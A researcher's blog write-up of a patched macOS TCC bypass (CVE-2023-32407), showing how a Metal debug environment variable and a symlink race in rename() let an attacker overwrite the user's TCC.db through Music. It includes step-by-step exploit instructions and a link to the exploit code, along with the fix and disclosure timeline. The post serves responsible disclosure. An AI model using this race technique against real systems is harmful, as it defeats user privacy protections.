lateralus (CVE-2023-32407) - a macOS TCC bypass

Posted on 2023-11-14 in blog

Since I owe you guys a bunch of writeups from my talk ( Unexpected, Unreasonable, Unfixable: Filesystem Attacks on macOS), I decided that I'll tackle lateralus today.

It's a simple, clean bug with a quick and satisfying resolution. I have been bitching about Apple in the past blogpost (and on twitter), so it feels good to give them credit where credit is due.

Background

This was a bug that I found using my automation framework I wrote last year. It took a bit of time but it was worth it, since with it I could:

select targets based on entitlements and library dependencies
run them over SSH in a dtrace harness (with SIP off)

The idea

My idea was the following: Do dumb analysis, but do it at scale.

Since by now I knew that macOS is absolutely massive and I knew for a fact that weird things can happen - like Music having FDA - I thought it was likely that obvious, easy bugs simply went unnoticed.

To test my theory, I picked a list of all FDA entitled apps on macOS and I had my dtracer run them one by one, while tracking the system calls and certain libc calls.

When I analysed this dataset, I grepped for getenv and to make things simpler, I also grepped for FILE, DIR, OUTPUT, LOG and the like.

To my surprise I got a few hits, which I could track down using my dtracer's backtrace functionality, which does exactly what you think it does.

This post is about one of these that stood out.

The bug

The environment variable MTL_DUMP_PIPELINES_TO_JSON_FILE is quite a special variable, utilised by the Metal framework. This framework is a dependency to various programs, most notably Music, which I really like since it has FDA.

If this env var is set, it pretty much does exactly what you think it does. It will open a file as the currently running application and write some debug data into it.

The file write is triggered in Metal via a call to NSFileManager's createFileAtPath(). As the name might suggest, createFileAtPath() creates a file at the path. It will also overwrite a file if it exists, which is pretty useful.

We have a pretty nice primitive on our hands, since - as attackers - we can trigger this in any application that uses Metal, and we can also control the file name completely. We will use this to eventually wrangle full content control out of the bug, but let's not get ahead of ourselves.

What does it do?

Let's set the following: MTL_DUMP_PIPELINES_TO_JSON_FILE="path/name"

If path is a valid directory, the bug will trigger and we can use fs_usage to see what is going on in the program:

a file will be open()ed, called path/.dat.nosyncXXXX.XXXXXX (X is random)
one or more write()s will write the contents to the file (we do not control this)
path/.dat.nosyncXXXX.XXXXXX will be renamed()d to path/name

It's a temporary file write, followed by a rename() in place. It took me a bit to figure out that this is not secure. You might have known this already, but I didn't.

rename()ing in place is NOT safe!

As it turns out, rename() does not work how I intuitively thought it would. I had no idea about this, and the only reason I know is because I spent quite a long time reading the xnu source code for a totally different reason.

You see, in order for rename(old, new) to work it has to "resolve" the paths in old and new to vnode_t kernel structures for both. Since filesystems are tricky (symlinks, hardlinks, mounts, . and .. files, firmlinks, etc...) this is not a straightforward task. Because of that, the paths old and new get resolved separately.

This is done, because old can be in new, it might be a symlink, new might be a directory, they might be the same, etc... The entire rename functionality is incredibly, incredibly complicated.

For more information you can check out the xnu function renameat_internal(), but buckle up if you do. It's not for the faint of heart.

So we know that rename(old, new) will resolve the parameters old and new separately. This seems pretty logical on the surface, since if old is /etc/passwd and new is /tmp/whatever, it's quite obvious that this needs to be done.

But what about the simpler case of just renaming a file within a directory?

I incorrectly assumed that rename("./tmp/a", "./tmp/b") will employ some sort of caching, or is somehow a less dangerous operation than a rename() that uses full absolute paths. It's not.

As far as the kernel is considered, the relative paths don't matter. Any path not starting with a "/" is considered relative, and in this case the starting "." is simply shorthand for "current working directory", or CWD for short. Technically, in the kernel this is called AT_FDCWD, but we don't need to know that.

So if our CWD is /Users/hacker/, this call is equivalent to:

rename("/Users/hacker/tmp/a", "/Users/hacker/tmp/b")

This does not look nearly as innocent now, especially since we know that the lookup will be performed twice. Why? Because this means that we can change /Users/hacker/tmp/ between the two lookups.

If we swap the tmp directory with a symlink at the right time (between the first, but before the second lookup), we can end up with an attacker controlled destination directory:

rename("/Users/hacker/test/tmp/a", "/PWNED/b")

There is one giant caveat to this:

There has to be a subdirectory in CWD that is attacker-controlled. rename()ing a file that is the direct descendant of the CWD is a special case that can not be raced! rename("./a", "./b") is safe, but rename("./tmp/a", "./tmp/b") is not.

I have incorrectly stated previously that this was also racy, but since then I realized that that is a mistake. For more information, check the correction blogpost on this blog.

We can do the swap in any number of ways, but it's most convenient to use the renamex_np(from, to, flags) system call with the flag RENAME_SWAP. This will atomically swap from and to if the filesystem supports it, and luckily all the default macOS filesystems (APFS and HFS+) do. This is not necessary for exploitation, it's only a convenience.

What we have now, is a fully controlled rename():

We can replace /PWNED/ with whatever we want
b originally came from our environment variable, so we can change it as well

This means that we have total control over the destination path.

The only thing that remains is controlling the contents of the source file.

Since we can redirect the rename() anywhere on the filesystem, we can simply specify a directory we own as the path to MTL_DUMP_PIPELINES_TO_JSON_FILE, with the filename set to the final destination filename.

This way:

we can catch the tempfile creation and control the contents
- or keep an open file descriptor to it
we still get to control the filename part of the destination path

The exploit

For example, to overwrite the user's TCC.db, we can:

create /Users/hacker/ourlink to point to /Users/hacker/Library/Application Support/com.apple.TCC/
create the directory /Users/hacker/tmp/
set MTL_DUMP_PIPELINES_TO_JSON_FILE=/Users/hacker/tmp/TCC.db
trigger the bug by running Music with this env var
catch the open() of /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX (X is random)
- here we also open() this file for writing, and hold on to the file descriptor
atomically switch /Users/hacker/tmp with /Users/hacker/ourlink in a loop
- we do this to maximize our chances of succeeding as the race window is pretty slim, but losing the race has negligible downside
wait a bit
test if we got lucky
- if not, run again from the top

What if we win the race?

If we got lucky, we just overwrote the user's TCC.db with a file that we have an open file descriptor to: it's game over.

What if we lose the race?

Notice that here we have two races:

race #1: catch the temp file after it's open()-ed
- this race is really easy to win
race #2: swap the directory between the old and new lookups in rename(old, new)
- this race is harder, so we use a loop

The worst that can happen is that we trash TCC.db, which is fairly inconsequential as we can just recover from it by using tccutil reset All, but that's a dirty solution. In oder to avoid that, we can make the exploit a lot more robust:

We will only attempt the second race after we won the first.

Since this way we always control the new file, we can avoid overwriting TCC.db with random data.

For race #2 (rename(old, new)), we can only have 4 different outcomes:

number #1 - we don't change either:

old: /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX

new: /Users/hacker/tmp/TCC.db

This is okay, since it's as if we did nothing.

number #2 - we change "tmp" in old but not new:

old: /Users/hacker/Library/Application Support/com.apple.TCC/.dat.nosyncXXXX.XXXXXX

new: /Users/hacker/tmp/TCC.db

This is okay, since the file referred to in old does not exist, and rename() errors out.

number #3 - we change "tmp" in new but not old:

old: /Users/hacker/tmp/.dat.nosyncXXXX.XXXXXX

new: /Users/hacker/Library/Application Support/com.apple.TCC/TCC.db

We win, this is the scenario we want :)

number #4 - we change "tmp" in new and old:

old: /Users/hacker/Library/Application Support/com.apple.TCC/.dat.nosyncXXXX.XXXXXX

new: /Users/hacker/Library/Application Support/com.apple.TCC/TCC.db

This is okay, since the file referred to in old does not exist, and rename() errors out.

There is no situation in which we can cause serious trouble.

This means that we are safe to swap the files in a loop and retry the exploit until we succeed.

This is as good as a filesystem bug can get.

Demo and code

Demo video

The full exploit code is on my github: https://github.com/gergelykalman/CVE-2023-32407-a-macOS-TCC-bypass-in-Metal

The fix

Apple simply removed the environment variable, closing the bug for good. Apple also removed several other environment variables in Metal that had similar abuse potential. Well done!

Root causes

The root cause of the bug was fairly simple: A privileged application was relying on a complex, configurable library that in turn used an insecure file write API.

Further research

Research into bugs like this will be heavily hindered by the introduction of AMFI (see conclusion section), so I don't see a big future in researching environment variables for the foreseeable future.

With that said, it's noteworthy that the dangerous createFileAtPath function in NSFileManager was not hardened.

Apple's response time and communication

Response time: great

The fix was in the beta 42 days after reporting, which I'm very happy with. It might have been there earlier, but that was the time I saw it.

The bug was not hard to track down (or fix), so that certainly helped. I think a fix like this is pretty much a best case response time, but I'll take 42 days with any bug. Hell, I'd take 90 if I could...

Communication: great

This was a much better experience than usual:

no passive-aggressive canned-responses
my questions/comments were NOT ignored
the other person seemed invested in solving the problem
the response time was fantastic

Communication-wise this was one of the best experiences I had in the program. Sure, there was not a lot of confusion and back-and-forth needed, but - at least to me - being treated like a human (and not a robot) goes a long way.

If you are the person I talked to: Thank You!

The bounty

Apple awarded me $30,500 for this bug, which was more than fair. It's an amount I gladly accept.

Initially I saw a sliver of hope that this bug would work on iOS, but both Apple and I had to conclude that it won't. I'm okay with that.

At the time this bounty seemed like a gift: This bug needed a lot less time and effort to work out than it usually does. That was weird, but I suppose sometimes you just get lucky, and since I'm usually not, I'm happy to take it.

Conclusion

All in all, this was a really easy bug, with a pretty large bounty and a great experience hunting in Apple's ASB. If most reports went half this good, I'd be a happy man.

Presumably related to this, Apple also rolled out AMFI, which pretty much kills the environment variable vector by cutting down the attack surface significantly. It was about time and the customers will be much better for it.

It makes me happy to think that I might have contributed - however little I could - to this.

May the universe's RNG shine on your terminal in your bug hunting journey.

Timeline

2023-03-15: Report sent to Apple
2023-03-28: Given a deadline of 2023-10-09, as my talk got accepted at OBTSv6
2023-04-26: I spotted a fix in beta2, it seems solid
2023-04-26: Apple confirms that it's the fix
2023-06-08: Bug is adjudicated for $30,500
2023-06-08: I dispute the amount as it affected multiple platforms
2023-06-08: Apple apologises for the confusion and confirms that multiple platforms are affected, however the bug is
deemed no exploitable on them. (fair enough)
2023-06-08: I promise to look into it
2023-06-09: I tell Apple that I will do this over the weekend, assuming I have to be quick
2023-06-10: Apple assures me that I can take as much time as I need
2023-06-11: After working over the weekend I couldn't find a good vector, as this requires env var setting, which is as far as I know is not possible on iOS. Apple's assessment was (unsurprisingly) correct
2023-06-12: Apple thanks me one more time and we discuss payment details, etc...